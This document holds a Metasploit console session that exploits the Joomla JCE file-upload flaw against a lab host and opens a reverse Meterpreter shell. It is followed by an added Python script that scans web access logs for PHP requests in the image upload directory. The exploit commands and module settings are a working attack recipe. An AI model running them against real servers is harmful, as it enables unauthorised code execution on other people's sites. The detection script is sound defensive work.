________________________________________________________
msf > use exploit/unix/webapp/joomla_comjce_imgmanager
msf exploit(joomla_comjce_imgmanager) > info
Name: Joomla Component JCE File Upload Remote Code Execution
Module: exploit/unix/webapp/joomla_comjce_imgmanager
Version: 0
Platform: PHP
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
Unknown
Heyder Andrade
Available targets:
Id Name
-- ----
0 Automatic
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
TARGETURI / yes Joomla directory path
VHOST no HTTP server virtual host
Payload information:
Space: 4000
Avoid: 1 characters
Description:
This module exploits a vulnerability in the JCE component for
Joomla!, which could allow an unauthenticated remote attacker to
upload arbitrary files, caused by the fails to sufficiently sanitize
user-supplied input. Sending specially-crafted HTTP request, a
remote attacker could exploit this vulnerability to upload a
malicious PHP script, which could allow the attacker to execute
arbitrary PHP code on the vulnerable system. This module has been
tested successfully on the JCE Editor 1.5.71 and Joomla 1.5.26.
References:
http://www.securityfocus.com/bid/49338
http://www.exploit-db.com/exploits/17734
msf exploit(joomla_comjce_imgmanager) > set RHOST 172.16.86.133
RHOST => 172.16.86.133
msf exploit(joomla_comjce_imgmanager) > exploit
[*] Started reverse handler on 172.16.86.1:4444
[*] Checking component version to 172.16.86.133:80
[+] Successfully uploaded cpizwa.gif
[*] Change Extension from cpizwa.gif to cpizwa.php
[+] Renamed cpizwa.gif to cpizwa.php
[*] Calling payload: cpizwa.php
[*] Sending stage (39217 bytes) to 172.16.86.133
[*] Meterpreter session 1 opened (172.16.86.1:4444 -> 172.16.86.133:60773) at Wed Mar 27 22:14:31 -0300 2013
[+] Deleted cpizwa.php
meterpreter > getuid
Server username: www-data (33)
meterpreter > shell
Process 7445 created.
Channel 0 created.
pwd
/var/www/joomla/images/stories
^C
Terminate channel 0? [y/N] y
meterpreter > quit
[*] Shutting down Meterpreter...
[*] 172.16.86.133 - Meterpreter session 1 closed. Reason: User exit
msf exploit(joomla_comjce_imgmanager) >
___________________________________________________________
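A defender-side check for the pattern in this session, as an added example that is not part of the original post or of Metasploit: the payload is requested as a .php file from the image upload directory (images/stories) and deleted right after, so the web server access log is where the request stays visible. The combined log format, the extension list and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Combined log format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')
# Upload directory seen in the session (pwd printed /var/www/joomla/images/stories)
UPLOAD_DIR = "/images/stories/"
# Extensions assumed to be mapped to the PHP handler; adjust to the server config
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)

def script_hits(lines, upload_dir=UPLOAD_DIR):
    """Return (ip, time, method, path, status) for script requests under upload_dir."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, when, method, target, status = m.groups()
        path = unquote(urlsplit(target).path)  # drop the query string, decode %xx
        idx = path.lower().find(upload_dir.lower())
        if idx < 0:
            continue
        # Test each segment below the upload dir: "x.php/extra" may still reach x.php
        segments = path[idx + len(upload_dir):].split("/")
        if any(SCRIPT_EXT.search(s) for s in segments):
            hits.append((ip, when, method, path, int(status)))
    return hits

# Constructed sample lines for illustration, not captured from a real server
SAMPLE = [
    '172.16.86.1 - - [27/Mar/2013:22:14:30 -0300] "GET /images/stories/logo.gif HTTP/1.1" 200 43 "-" "-"',
    '172.16.86.1 - - [27/Mar/2013:22:14:31 -0300] "GET /images/stories/cpizwa.php HTTP/1.1" 200 0 "-" "-"',
    '10.0.0.5 - - [27/Mar/2013:22:15:02 -0300] "GET /index.php?option=com_content HTTP/1.1" 200 5120 "-" "-"',
    '10.0.0.7 - - [27/Mar/2013:22:16:40 -0300] "POST /images/stories/old/Banner.PhP?x=1 HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for hit in script_hits(SAMPLE):
        print("script request in upload dir:", hit)
```

A hit with status 200 means the server executed or served a script from a directory that should only hold images; a 404 hit is still worth reviewing because the module deletes its payload after use.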